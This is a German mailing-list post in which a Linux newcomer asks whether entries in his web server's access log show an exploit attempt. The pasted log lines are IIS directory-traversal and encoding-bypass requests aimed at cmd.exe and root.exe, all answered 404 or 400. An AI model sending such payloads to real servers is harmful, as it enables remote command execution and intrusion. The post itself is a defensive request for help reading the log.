Hi Liste, da ich noch ziemlich neu im Linuxgeschäft bin, eine dumme Frage: Im Access-Log meines lokalen Webservers tauchen Zugriffe von ip-Adressen ausserhalb meines LANs auf. Die Adressen gehören zum gleichen Pool wie mein Provider. Darf ich davon ausgehen das jemand mit einem Portscanner meinen Server entdeckt hat während ich online war, und dann versucht hat darauf zuzugreifen? Ich vermute mal, das die Einträge (s.u.) darauf hinweisen, das verschiedene Exploits ausprobiert wurden. Danke für Hinweise, Ekki Einträge sehen z.B. so aus: xx.xx.xx.xx - - [02/Jan/2002:22:02:13 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 xx.xx.xx.xx - - [02/Jan/2002:22:02:14 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+di xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+di xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:15 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 xx.xx.xx.xx - - [02/Jan/2002:22:02:16 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3 xx.xx.xx.xx - - [02/Jan/2002:22:02:17 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307